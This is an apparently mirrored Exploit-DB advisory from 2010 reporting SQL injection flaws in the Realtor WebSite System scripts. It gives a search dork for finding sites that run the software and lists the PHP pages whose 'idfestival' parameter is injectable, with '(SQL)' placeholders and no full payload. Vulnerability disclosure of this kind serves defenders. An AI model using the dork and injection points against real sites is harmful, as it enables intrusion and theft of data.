Realtor WebSite System E-Commerce – idfestival SQL Injection

  • 作者: CoBRa_21
    日期: 2010-05-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12776/
  • -------------------------------------------------------------------------------------------
    
    Realtor WebSite System E-Commerce ("all files".php SQL Injection Vulnerability
     
    -------------------------------------------------------------------------------------------
     
    Author : CoBRa_21
    
    Script Home : http://www.redcatstudios.net/
     
    Dork : "Web Site Design by Red Cat Studios"
    
    -------------------------------------------------------------------------------------------
     
    SQL Injection:
     
    http://localhost/[path]/sponsorslist.php?idfestival=-7 (SQL)
    http://localhost/[path]/index2.php?idfestival=7 (SQL)
    http://localhost/[path]/venues.php?idfestival=7 (SQL)
    http://localhost/[path]/getpasses_new.php?idfestival=7 (SQL)
    http://localhost/[path]/awards.php?idfestival=7 (SQL)
    http://localhost/[path]/mailing.php?idfestival=7 (SQL)
    http://localhost/[path]/news.php?idfestival=7 (SQL)
    http://localhost/[path]/filmlist.php?idfestival=7 (SQL)
    http://localhost/[path]/calendar.php?idfestival=7 (SQL)
    http://localhost/[path]/gallery.php?idfestival=7 (SQL)
    http://localhost/[path]/gallery.php?idfestival=7&idgallery=56 (SQL)
    http://localhost/[path]/contact.php?idfestival=7 (SQL)
    http://localhost/[path]/(All Files).php?idfestival= (SQL)
    
    -------------------------------------------------------------------------------------------